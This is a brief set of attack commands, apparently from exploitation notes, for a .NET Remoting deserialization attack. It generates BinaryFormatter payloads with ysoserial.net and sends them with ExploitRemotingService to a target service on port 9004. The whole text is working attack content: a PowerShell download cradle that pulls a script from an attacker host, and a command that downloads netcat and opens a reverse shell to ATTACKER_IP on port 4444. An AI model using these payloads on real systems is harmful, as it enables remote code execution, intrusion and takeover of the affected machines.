# Step 1: Generate payload with ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\out.txt"

# Step 2: Use ExploitRemotingService to send payload
ExploitRemotingService.exe tcp://TARGET_IP:9004/UAVRServer raw payload.bin

# Alternative: Use different gadget chains
# For reverse shell:
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

# For file download and execute:
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"